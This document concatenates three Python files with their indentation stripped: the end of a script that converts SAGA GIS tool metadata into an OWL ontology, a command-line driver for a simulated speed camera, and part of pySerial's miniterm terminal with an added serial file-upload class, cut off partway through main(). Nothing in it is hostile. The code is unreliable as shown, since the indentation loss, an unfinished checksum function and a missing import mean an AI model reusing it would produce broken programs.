config = OWLUtils.get_config(module_path + '/config.ini')
tasks = config.options('task')
for task_item in tasks:
# print(task_item)
if task_item in _keywords:
task_cls = config.get('task', task_item)
task_name = Preprocessor.task_name(tool_name)
if task[task_name] is None:
task_ins = task[task_cls](task_name, prefLabel=locstr(en_str.replace('Tool', '') + " task", lang='en'))
# task_ins = task[task_cls](tool_name + "_task", prefLabel=locstr(en_str.replace('Tool', '') + " task", lang='en'))
task_ins.description.append(locstr(desc, lang='en'))
task_ins.isAtomicTask = True
task_ins.identifier = task_name
else:
task_ins = task[task_name]
if (task_ins in tool.usedByTask) is False:
tool.usedByTask.append(task_ins)
if (tool in tool.processingTool) is False:
task_ins.processingTool.append(tool)
# TODO TEST
def handle_similar_tools(tool, tool_label):
"""link tools that have the same names"""
clean_tool_label = Preprocessor.remove_bracket_content(tool_label)
similars = onto.search(prefLabel=clean_tool_label + '*')
if len(similars) > 0:
for similar in similars:
if clean_tool_label == Preprocessor.remove_bracket_content(similar.prefLabel[0]):
tool.closeMatch.append(similar)
similar.closeMatch.append(tool)
def map_to_owl(json_data):
for d in json_data:
"""mapping json data to ontology properties"""
name = Preprocessor.toolname_underline(d['name'])
# name = re.sub("[()-*,/]", " ", name).strip()
executable = Preprocessor.normalize("saga_cmd ", d['command']['exec'])
keywords = d['keywords']
toolClass = tool_class(keywords)
if onto[name]:
# if has the same name and executable
if onto[name].executable == executable:
onto[name].is_a.append(toolClass)
continue
else:
name = name + '_' + keywords[0].replace(' ', '_')
tool = toolClass(name, prefLabel=locstr(re.sub('^(Tool)[0-9: ]+', '', d['name']), lang='en'))
# tool = toolClass(Preprocessor.space_2_underline(name), prefLabel=locstr(re.sub('^(Tool)[0-9: ]+', '', d['name']), lang='en'))
tool.isToolOfSoftware.append(cyber.SAGA_GIS)
tool.identifier = name
tool.manualPageURL.append(d['manual_url'])
# task
handle_task(tool, name, d['name'], keywords, OWLUtils.join_list(d['description']))
tool.executable = executable
tool.commandLine.append(Preprocessor.normalize("Usage: ", d['command']['cmd_line']))
tool.authors.append(OWLUtils.join_keywords(d['authors']))
for reference in d['references']:
tool.references.append(reference)
# keywords
keywords.append(name.replace('_', ' '))
OWLUtils.link_to_domain_concept(tool, keywords)
# applicaiton category
OWLUtils.application_category(tool, [d['keywords'][0]], d['keywords'][1], d['keywords'][2:])
tool.description.append(OWLUtils.join_list(d['description']))
if d['parameters']:
for item, itemValue in d['parameters'].items():
if item == 'inputs':
handle_inout(tool, itemValue, 'input')
elif item == 'outputs':
handle_inout(tool, itemValue, 'output')
elif item == 'options':
for optionItem in itemValue:
handle_options(tool, optionItem, onto)
def tool_class(keywords):
tool_cls = keywords[0].replace(' ', '') + 'Tool'
return OWLUtils.create_onto_class(onto, tool_cls, SagaTool)
if __name__ == "__main__":
module_path = os.path.dirname(__file__)
with open(module_path + '/saga.json', 'r') as f:
jdata = json.load(f) # list
# print(len(jdata))
# otherwise will report stack overflow exception
size = 1024 * 1024 * 1024 * 20 # related to system
threading.stack_size(size)
thread = threading.Thread(target=map_to_owl(jdata))
thread.start()
g.serialize('saga.ttl',format='turtle')
# onto.save(file='saga.owl', format="rdfxml")
# update task ontology
task.save()
print('SAGA Done!')
|
speed-camera.py
|
#! /usr/bin/env python
from smartcameras.speedcamera import SpeedCamera
import threading
def main():
print("########################################")
print ""
print("You have ordered a new speed camera!")
print("We need some details before activating it:")
print ""
print("########################################")
street = raw_input('Please enter the street: ')
city = raw_input('Please enter the city: ')
speedLimit = 0
while speedLimit < 30:
speedLimit = raw_input('Please enter the speed limit (>= 30): [50]' )
if speedLimit == "":
speedLimit = 50
break
else:
try:
speedLimit = int(speedLimit)
except ValueError:
speedLimit = 0
print "FAILED: Value must be an integer!"
rate = 0
while rate <= 0:
rate = raw_input('Please enter the mean num of sightings per second (>0): [5] ')
if rate == "":
rate = 5
break
else:
try:
rate = float(rate)
except ValueError:
rate = 0
print "FAILED: Value must be a float!"
print("########################################")
print ""
print("Thanks! The camera is now being activated!")
print ""
print("########################################")
print ""
camera = SpeedCamera(street, city)
thread = threading.Thread(target=camera.activate, args=(speedLimit, rate))
thread.daemon = True
thread.start()
while not camera.isActive:
time.sleep(1)
print("The camera is now active!")
print ""
usage = '''
Operate on the camera (type on the terminal one of the following commands):
help - prompt this message
print - print camera details
relocate - move the camera to a new street (and city)
restart - restart the camera with a new speed limit
exit - deactivate the camera and terminate
'''
print(usage)
while True:
todo = raw_input("----> ")
if todo == 'relocate':
newStreet = raw_input("New street: ")
newCity = raw_input("New city: [same] ") or None
camera.relocate(newStreet, newCity)
print("Camera relocated! Operating on %s at %s" % (camera.street, camera.city))
elif todo == 'restart':
newLimit = 0
while newLimit < 30:
newLimit = raw_input('Please enter the speed limit (>= 30): [50] ')
if newLimit == "":
newLimit = 50
break
else:
try:
newLimit = int(newLimit)
except ValueError:
newLimit = 0
print "FAILED: Value must be an integer!"
print "..."
camera.deactivate()
thread.join()
thread = threading.Thread(target=camera.activate, args=(newLimit, rate))
thread.daemon = True
thread.start()
print "Camera restarted!"
elif todo == 'exit':
break
elif todo == 'print':
print(camera.toJson())
elif todo == '':
continue
else:
print(usage)
camera.deactivate()
thread.join()
print "Camera deactivated."
print "Closing..."
if __name__ == "__main__":
main()
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import struct
import time
import fnmatch
import math
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class FileTrans(object):
MSG_TYPE_OPEN_FILE = 130
MSG_TYPE_CLOSE_FILE = 131
MSG_TYPE_FILE_DATA = 132
MSG_TYPE_EXIT = 133
def __init__(self, serial, path):
self.serial = serial
self.path = path
def listdir(self):
self.filelist = list()
path = os.path.abspath(self.path)
if os.path.isdir(path):
listdir = [os.path.join(path, x) for x in os.listdir(path)]
self.filelist = list(filter(lambda x: os.path.isfile(x), listdir))
elif os.path.isfile(path):
self.filelist.append(path)
elif path.endswith("*"):
filterfile = list(filter(lambda x: fnmatch.fnmatch(x, os.path.basename(path)),
os.listdir(os.path.dirname(path))))
self.filelist = [os.path.join(os.path.dirname(path), x) for x in filterfile]
def pkt_enc(self, block):
magic = 0x45678998
pkt = struct.pack("I", magic)
pkt = pkt + struct.pack("H", len(block))
pkt = pkt + block
return pkt
def msg_enc(self, type, data):
msg = struct.pack("B", type)
msg = msg + data
pkt = self.pkt_enc(msg)
self.serial.write(pkt)
unused = self.serial.read(2)
unused = struct.unpack("H", unused)[0]
if unused < 8:
time.sleep(math.pow(2, 8 - unused) * 0.1)
def loop(self):
self.listdir()
for file in self.filelist:
sys.stderr.write('--- Sending file {} ---\n'.format(file))
self.msg_enc(self.MSG_TYPE_OPEN_FILE, os.path.basename(file.encode()))
with open(file, "rb") as fd:
while True:
block = fd.read(128)
sys.stderr.write('.')
if len(block) > 0:
self.msg_enc(self.MSG_TYPE_FILE_DATA, block)
else:
break
self.msg_enc(self.MSG_TYPE_CLOSE_FILE, bytes(0))
sys.stderr.write('\n--- File {} sent ---\n'.format(file))
self.msg_enc(self.MSG_TYPE_EXIT, bytes(0))
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def cal_csum(self, data):
sum = 0
for b in data:
sum
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
self._stop_reader()
trans = FileTrans(self.serial, filename)
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
trans.loop()
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
self._start_reader()
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=115200, default_rts=0, default_dtr=0):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
